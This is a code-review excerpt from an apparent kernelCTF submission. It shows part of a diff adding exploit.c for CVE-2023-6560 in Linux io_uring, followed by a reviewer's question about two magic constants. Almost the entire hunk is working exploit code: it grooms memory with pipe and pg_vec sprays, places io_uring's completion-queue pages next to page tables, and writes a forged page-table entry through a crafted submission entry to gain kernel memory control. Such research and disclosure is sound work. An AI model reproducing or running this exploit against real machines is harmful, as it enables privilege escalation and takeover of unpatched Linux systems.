pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c

```diff
@@ -0,0 +1,416 @@
+    SYSCHK(pipe(pipe_fds[i]));
+    SYSCHK(write(pipe_fds[i][1], buf, 1));
+  }
+
+  // We keep the first half of the pipe pages; hopefully, they can keep the discontinuous order-0 pages. Free those whose indices satisfy `indices % 4 == 0`.
+  for (int i = SPRAY_PIPE_NUM / 2; i < SPRAY_PIPE_NUM; i += 4) {
+    SYSCHK(close(pipe_fds[i][0]));
+    SYSCHK(close(pipe_fds[i][1]));
+    pipe_fds[i][0] = 0;
+    pipe_fds[i][1] = 0;
+  }
+
+  // Spray pg_vec to hopefully reuse one of the freed slots for a `pg_vec` array.(We only care about the first `pg_vec` buffer, which later will serve as CQ’s Page A.)
+  int cq_page_a_fd = pagealloc_pad(NUM_CQ_PAGES, PAGE_SIZE);
+
+  // Free the pages whose indices satisfy `indices % 4 != 0`, and spray page table entries in their place.
+  for (int i = SPRAY_PIPE_NUM / 2; i < SPRAY_PIPE_NUM; i++) {
+    if (!pipe_fds[i][0])
+      continue;
+    SYSCHK(close(pipe_fds[i][0]));
+    SYSCHK(close(pipe_fds[i][1]));
+    pipe_fds[i][0] = 0;
+    pipe_fds[i][1] = 0;
+  }
+
+  // Spray pmd page
+  for (int i = 0; i < SPRAY_PMD_NUM; i++)
+      *(char *)((size_t)page_spray[i]) = 'A';
+  
+  // Preserving SQ Functionality
+  int sqes_fd = pagealloc_pad(1, SQ_SZ);
+  sqes =
+      SYSCHK(mmap((void *)0x1234000000, SQ_SZ, PROT_READ | PROT_WRITE,
+                  MAP_SHARED | MAP_POPULATE, sqes_fd, 0));
+  SYSCHK(mmap((void *)(0x1234000000 + SQ_SZ - PAGE_SIZE), SQ_SZ,
+              PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_POPULATE,
+              sqes_fd, 0));
+
+  // Likely CQ’s Page A ends up adjacent to the page table entries we intend to corrupt
+  rings = SYSCHK(mmap((void *)0xdead0000, CQ_SZ,
+                             PROT_READ | PROT_WRITE, MAP_SHARED, cq_page_a_fd, 0));
+  SYSCHK(mmap((void *)0xdead0000 + CQ_SZ - PAGE_SIZE, CQ_SZ,
+              PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, cq_page_a_fd, 0));
+
+  // *&rings->sq.tail = ctx->sq_entries
+  *(volatile unsigned int *)(rings + 4) = SQ_ENTRIES;
+
+  // Trigger the vulnerability
+  struct io_uring_params params = {
+      .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY,
+      .sq_off = {.user_addr = (unsigned long)sqes},
+      .cq_off = {.user_addr = (unsigned long)rings}};
+  int uring_fd = SYSCHK(
+      syscall(__NR_io_uring_setup, /*entries=*/ SQ_ENTRIES, &params));
+  logi("uring_fd @ %d", uring_fd);
+
+  // Fill the CQ's Page A
+  int sqes_offset = 0;
+  struct io_uring_sqe *sqe = NULL;
+  for (; sqes_offset < (PAGE_SIZE - /* offsetof(struct io_rings, cqes) */0x40) * (sizeof(struct io_uring_sqe) / sizeof(struct io_uring_cqe)); sqes_offset += sizeof(struct io_uring_sqe)) {
+    sqe = (struct io_uring_sqe *)(sqes + sqes_offset);
+    memset(sqe, 0, sizeof(*sqe)); //  NOP
+  }
+
+  // Set up the sqe to overwrite the first page table entry
+  sqe = (struct io_uring_sqe *)(sqes + sqes_offset);
+  memset(sqe, 0, sizeof(*sqe));
+  sqe->opcode = IORING_OP_NOP;
+  sqe->user_data = 0x9c000 | 0x8000000000000067;
```

Comment:
Can you comment here, what these values (`0x9c000` and `0x67`) mean?

More info here: https://google.github.io/security-research/kernelctf/style_guide#example-non-trivial-constant-values